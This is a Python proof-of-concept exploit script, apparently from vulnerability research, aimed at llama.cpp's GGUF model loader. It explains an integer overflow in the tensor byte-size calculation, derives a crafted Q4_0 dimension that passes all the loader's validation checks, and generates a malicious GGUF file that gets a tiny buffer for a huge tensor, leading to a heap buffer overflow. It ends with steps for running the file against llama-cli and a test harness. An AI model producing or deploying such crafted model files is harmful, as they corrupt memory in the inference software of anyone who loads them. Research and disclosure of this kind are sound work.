File size: 19,196 Bytes

d6a1163

#!/usr/bin/env python3
"""
PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)

=== Vulnerability Summary ===

In ggml_row_size() (ggml.c:1275):
    size_t ggml_row_size(enum ggml_type type, int64_t ne) {
        return ggml_type_size(type)*ne/ggml_blck_size(type);
    }

The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t)
arithmetic. When type_size * ne > 2^64, this silently wraps around, producing a
much smaller result than expected. The subsequent division by blck_size then yields
a tiny value.

This propagates to:
  - ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed
  - ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed
  - Buffer allocation and data loading code

The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT
(ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check that the BYTE SIZE
(element_count * type_size / blck_size) fits in size_t. For quantized types where
type_size > blck_size, the byte size can overflow even when the element count doesn't.

The check at gguf.cpp line 589:
    uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type)

uses ggml_nelements() which itself computes ne[0]*ne[1]*ne[2]*ne[3] in int64_t.
For our chosen values, this product fits in int64_t, so ggml_nelements returns the
correct value. BUT the subsequent division and comparison uses integer arithmetic
that can be imprecise for values near SIZE_MAX.

=== Exploit Strategy ===

For GGML_TYPE_Q4_0:
  - type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
  - blck_size = 32

We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value.

  ne[0] = 1024819115206086208  (divisible by 32)

  Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128
  In uint64:   18 * ne[0] mod 2^64 = 128
  After /32:   128 / 32 = 4 bytes  (ggml_row_size returns 4!)

  Correct:     18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
  Computed:    4 bytes

  Ratio: buffer is 144,115,188,075,855,873x too small!

Validation bypass:
  - ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
  - ne[0] > 0 -> passes non-negative check
  - ne[0] % 32 == 0 -> passes block alignment check
  - ggml_nelements = ne[0] = 1024819115206086208
  - nelements/32 = 32025597350190194
  - SIZE_MAX/18 = 1024819115206086200
  - 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)!

Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed
by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the
first few bytes triggers a heap buffer overflow.

=== GGUF Binary Format Reference ===

Header:
  - Magic: "GGUF" (4 bytes)
  - Version: uint32 (3)
  - n_tensors: uint64
  - n_kv: uint64

KV pairs:
  - key: string (uint64 len + chars)
  - type: uint32 (GGUF type enum)
  - value: type-dependent

Tensor info (per tensor):
  - name: string (uint64 len + chars)
  - n_dims: uint32
  - ne[0..n_dims-1]: int64 each
  - type: uint32 (ggml_type enum)
  - offset: uint64

Data section: aligned to ctx->alignment (default 32)
"""

import struct
import sys
import os
import math

# ============================================================
# GGUF constants
# ============================================================
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3

# GGUF value types
GGUF_TYPE_UINT8   = 0
GGUF_TYPE_INT8    = 1
GGUF_TYPE_UINT16  = 2
GGUF_TYPE_INT16   = 3
GGUF_TYPE_UINT32  = 4
GGUF_TYPE_INT32   = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL    = 7
GGUF_TYPE_STRING  = 8
GGUF_TYPE_ARRAY   = 9
GGUF_TYPE_UINT64  = 10
GGUF_TYPE_INT64   = 11
GGUF_TYPE_FLOAT64 = 12

# ggml_type enum values
GGML_TYPE_F32  = 0
GGML_TYPE_F16  = 1
GGML_TYPE_Q4_0 = 2
GGML_TYPE_Q4_1 = 3
GGML_TYPE_Q5_0 = 6
GGML_TYPE_Q5_1 = 7
GGML_TYPE_Q8_0 = 8
GGML_TYPE_I8   = 24
GGML_TYPE_I32  = 26

# Q4_0 type properties
Q4_0_TYPE_SIZE = 18   # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16
Q4_0_BLCK_SIZE = 32   # QK4_0

INT64_MAX = (1 << 63) - 1
UINT64_MAX = (1 << 64) - 1
SIZE_MAX = UINT64_MAX  # 64-bit platform

GGML_DEFAULT_ALIGNMENT = 32

# ============================================================
# Helper functions
# ============================================================

def write_string(f, s):
    """Write a GGUF string: uint64 length + chars (no null terminator)"""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)

def write_kv_string(f, key, value):
    """Write a KV pair with string value"""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)

def write_kv_uint32(f, key, value):
    """Write a KV pair with uint32 value"""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))

def write_kv_float32(f, key, value):
    """Write a KV pair with float32 value"""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))

def write_kv_string_array(f, key, values):
    """Write a KV pair with string array value"""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        write_string(f, v)

def write_kv_float32_array(f, key, values):
    """Write a KV pair with float32 array value"""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<f', v))

def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset):
    """Write a single tensor info entry"""
    write_string(f, name)
    f.write(struct.pack('<I', n_dims))
    for i in range(n_dims):
        f.write(struct.pack('<q', ne_list[i]))  # int64_t (signed)
    f.write(struct.pack('<I', ggml_type))
    f.write(struct.pack('<Q', offset))


# ============================================================
# Overflow calculation and verification
# ============================================================

def compute_overflow_ne0():
    """
    Find ne[0] for Q4_0 type such that:
      - ne[0] is positive and fits in int64_t (< 2^63)
      - ne[0] is divisible by blck_size (32)
      - 18 * ne[0] overflows uint64_t to a very small value
      - All GGUF validation checks pass

    We solve: 18 * ne[0] = k * 2^64 + remainder
    For k=1: ne[0] = (2^64 + remainder) / 18
    We want remainder to be small and divisible by 32 (so that
    ggml_row_size = remainder/32 is small).

    18 * ne[0] = 2^64 + 128  (remainder=128, 128/32=4)
    ne[0] = (2^64 + 128) / 18 = 1024819115206086208
    """
    type_size = Q4_0_TYPE_SIZE  # 18
    blck_size = Q4_0_BLCK_SIZE  # 32

    # We want: type_size * ne0 = 2^64 + target_remainder
    # Choose target_remainder = 128 (divisible by 32, gives row_size of 4)
    target_remainder = 128
    target_product = (1 << 64) + target_remainder

    if target_product % type_size != 0:
        raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}")

    ne0 = target_product // type_size
    assert ne0 * type_size == target_product, "Arithmetic check failed"

    # Verify ne0 is divisible by blck_size
    assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}"

    # Verify ne0 fits in int64_t
    assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t"

    return ne0


def verify_overflow(ne0, ne1=1, ne2=1, ne3=1):
    """Verify that the chosen dimensions bypass all checks and cause overflow"""
    type_size = Q4_0_TYPE_SIZE
    blck_size = Q4_0_BLCK_SIZE

    print(f"\n{'='*70}")
    print("OVERFLOW ANALYSIS")
    print(f"{'='*70}")
    print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})")
    print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}")
    print()

    # Check 1: gguf.cpp line 540-546 - non-negative check
    assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
    print("[PASS] All ne[j] >= 0 (non-negative check)")

    # Check 2: gguf.cpp line 550-552 - overflow check
    # INT64_MAX/ne[1] <= ne[0]  -> must be FALSE to pass
    check1 = INT64_MAX // ne1 <= ne0
    print(f"  Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}")
    assert not check1, "Failed overflow check 1!"

    # INT64_MAX/ne[2] <= ne[0]*ne[1]  -> must be FALSE
    prod01 = ne0 * ne1  # Safe in Python (arbitrary precision)
    assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
    check2 = INT64_MAX // ne2 <= prod01
    print(f"  Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}")
    assert not check2, "Failed overflow check 2!"

    # INT64_MAX/ne[3] <= ne[0]*ne[1]*ne[2]  -> must be FALSE
    prod012 = prod01 * ne2
    assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!"
    check3 = INT64_MAX // ne3 <= prod012
    print(f"  Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}")
    assert not check3, "Failed overflow check 3!"

    print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")

    # Check 3: gguf.cpp line 580 - block alignment
    assert ne0 % blck_size == 0
    print(f"[PASS] ne[0] % blck_size == 0 (block alignment check)")

    # Check 4: gguf.cpp line 589 - byte size representable
    nelements = ne0 * ne1 * ne2 * ne3
    assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
    lhs = nelements // blck_size  # uint64_t(ggml_nelements/blck_size)
    rhs = SIZE_MAX // type_size   # SIZE_MAX/type_size
    byte_check = lhs > rhs
    print(f"  Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
    assert not byte_check, "Failed byte size check!"
    print("[PASS] Byte size check at gguf.cpp:589 bypassed")

    # Now compute the ACTUAL overflow
    print(f"\n{'='*70}")
    print("SIZE COMPUTATION (showing the overflow)")
    print(f"{'='*70}")

    # ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size
    true_product = type_size * ne0
    wrapped_product = true_product % (1 << 64)  # uint64_t wrap
    row_size_overflowed = wrapped_product // blck_size
    row_size_correct = true_product // blck_size

    print(f"\nggml_row_size computation:")
    print(f"  type_size * ne[0] = {true_product}")
    print(f"  = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
    print(f"  In uint64_t (mod 2^64): {wrapped_product}")
    print(f"  After / blck_size: {row_size_overflowed} bytes  <-- OVERFLOWED!")
    print(f"  Correct value:     {row_size_correct} bytes")
    print(f"  Overflow factor:   {row_size_correct / row_size_overflowed:.0f}x too small!")

    # data_size computation
    data_size = row_size_overflowed
    for dim in [ne1, ne2, ne3]:
        if dim > 1:
            data_size = (data_size * dim) % (1 << 64)

    correct_size = row_size_correct * ne1 * ne2 * ne3

    print(f"\ndata_size (ggml_new_tensor_impl):")
    print(f"  Computed:  {data_size} bytes ({data_size} B)")
    print(f"  Correct:   {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")

    # ggml_nbytes computation
    # For quantized: nbytes = ne[0]*nb[0]/blck_size + sum((ne[i]-1)*nb[i])
    nb0 = type_size  # = 18
    nb1 = type_size * (ne0 // blck_size)  # This doesn't overflow because ne0/32 is reasonable
    nb2 = nb1 * ne1
    nb3 = nb2 * ne2

    # ne[0] * nb[0] overflows!
    ne0_nb0_true = ne0 * nb0
    ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
    nbytes_first = ne0_nb0_wrapped // blck_size

    nbytes = nbytes_first
    if ne1 > 1:
        nbytes += (ne1 - 1) * nb1
    if ne2 > 1:
        nbytes += (ne2 - 1) * nb2
    if ne3 > 1:
        nbytes += (ne3 - 1) * nb3

    nbytes_correct = correct_size

    print(f"\nggml_nbytes:")
    print(f"  ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}")
    print(f"  In uint64_t: {ne0_nb0_wrapped}")
    print(f"  / blck_size: {nbytes_first}")
    print(f"  + stride terms: {nbytes - nbytes_first}")
    print(f"  Total nbytes:  {nbytes} bytes")
    print(f"  Correct value: {nbytes_correct} bytes")

    # What gets allocated vs what the tensor "thinks" it has
    padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
    print(f"\n{'='*70}")
    print("HEAP BUFFER OVERFLOW")
    print(f"{'='*70}")
    print(f"  Buffer allocated:    {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
    print(f"  Tensor logical size: {nbytes_correct} bytes")
    print(f"  Overflow:            {nbytes_correct - padded} bytes beyond allocation")
    print(f"  Stride nb[1]:        {nb1} bytes (distance between rows)")
    print(f"  Any access to row 1+ is {nb1 - padded} bytes out of bounds!")

    return data_size, nbytes, padded


def create_poc_gguf(output_path):
    """
    Create a GGUF file with a tensor whose dimensions cause integer overflow
    in ggml_row_size(), resulting in a tiny buffer allocation for what should
    be an enormous tensor.
    """
    ne0 = compute_overflow_ne0()
    ne1 = 1  # Keep simple - 1D tensor is enough to trigger the overflow
    ne2 = 1
    ne3 = 1

    data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)

    # ---- Build the GGUF file ----

    # Metadata KV pairs needed for llama.cpp to proceed with loading
    kv_pairs = []
    n_kv = 0

    # Tensors: one tensor with overflow-inducing dimensions
    # Use a name that llama.cpp expects for a llama model
    tensor_name = "token_embd.weight"
    n_tensors = 1

    print(f"\n{'='*70}")
    print("GENERATING GGUF FILE")
    print(f"{'='*70}")
    print(f"  Tensor: '{tensor_name}'")
    print(f"  Type: Q4_0 (type_size=18, blck_size=32)")
    print(f"  Dimensions: ne[0]={ne0}")
    print(f"  Tensor data in file: {padded_size} bytes (the overflowed/small size)")
    print(f"  Output: {output_path}")

    with open(output_path, 'wb') as f:
        # ---- GGUF Header ----
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))

        # Minimal token vocabulary (just 4 tokens: UNK, BOS, EOS, and a word)
        vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
        vocab_scores = [0.0, 0.0, 0.0, -1.0]
        vocab_types  = [0, 3, 3, 1]  # NORMAL=0, CONTROL=3, NORMAL=1

        # Count KV pairs: 13 scalar + 3 array = 16
        n_kv = 16
        f.write(struct.pack('<Q', n_kv))

        # ---- Write scalar KV pairs ----
        write_kv_string(f, "general.architecture", "llama")
        write_kv_string(f, "general.name", "overflow-poc")
        write_kv_uint32(f, "llama.context_length", 2048)
        write_kv_uint32(f, "llama.embedding_length", 4096)
        write_kv_uint32(f, "llama.block_count", 1)
        write_kv_uint32(f, "llama.feed_forward_length", 11008)
        write_kv_uint32(f, "llama.attention.head_count", 32)
        write_kv_uint32(f, "llama.attention.head_count_kv", 32)
        write_kv_float32(f, "llama.rope.freq_base", 10000.0)
        write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
        write_kv_string(f, "tokenizer.ggml.model", "llama")
        write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1)
        write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2)

        # ---- Write array KV pairs (tokenizer vocab) ----
        write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens)
        write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores)

        # token types: int32 array
        write_string(f, "tokenizer.ggml.token_type")
        f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
        f.write(struct.pack('<I', GGUF_TYPE_INT32))
        f.write(struct.pack('<Q', len(vocab_types)))
        for t in vocab_types:
            f.write(struct.pack('<i', t))

        # ---- Write Tensor Info ----
        # Tensor: 1D Q4_0 tensor with overflow-inducing ne[0]
        write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0)

        # ---- Align to data section ----
        current_pos = f.tell()
        aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
        padding_needed = aligned_pos - current_pos
        if padding_needed > 0:
            f.write(b'\x00' * padding_needed)

        # ---- Write tensor data ----
        # Write exactly padded_size bytes of tensor data (the overflowed small amount)
        # In practice, filling with a recognizable pattern helps identify OOB reads
        tensor_data = b'\xAA' * padded_size
        f.write(tensor_data)

    file_size = os.path.getsize(output_path)
    print(f"  File size: {file_size} bytes")
    print(f"\n[+] GGUF file written successfully")

    return output_path


def main():
    output_dir = "/Users/eltarne/Documents/script/gguf_poc"
    os.makedirs(output_dir, exist_ok=True)

    output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")

    print("=" * 70)
    print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
    print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
    print("=" * 70)

    # Step 1: Compute the overflow-inducing dimension
    ne0 = compute_overflow_ne0()
    print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
    print(f"    = 0x{ne0:016X}")
    print(f"    Fits in int64_t: {ne0 < (1 << 63)}")
    print(f"    Divisible by 32: {ne0 % 32 == 0}")

    # Step 2: Verify all checks are bypassed
    print(f"\n[+] Verifying validation bypass and computing overflow...")

    # Step 3: Create the GGUF file
    create_poc_gguf(output_path)

    # Step 4: Instructions
    print(f"\n{'='*70}")
    print("EXPLOITATION")
    print(f"{'='*70}")
    print(f"""
When llama.cpp loads this GGUF file:

1. gguf_init_from_file() reads tensor info:
   - ne[0] = {ne0}
   - type  = Q4_0 (type_size=18, blck_size=32)
   - All validation checks PASS (see analysis above)

2. ggml_nbytes() computes tensor size:
   - ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
   - In uint64_t: {(ne0 * 18) % (1 << 64)}  (OVERFLOWED!)
   - Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32}

3. Buffer allocation uses the tiny overflowed size
   -> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated

4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
   -> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW

To test with llama-cli (demonstrates GGUF validation bypass):
  cd /Users/eltarne/Documents/script/llama.cpp/build/bin
  ./llama-cli -m {output_path} -p 'hello' 2>&1
  # Note: llama-cli rejects at model-level shape check, but GGUF parsing passes

To test with the C test harness (demonstrates the actual overflow):
  cd /Users/eltarne/Documents/script/gguf_poc
  ./test_tensor_overflow poc_tensor_overflow.gguf
  # Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW
""")


if __name__ == "__main__":
    main()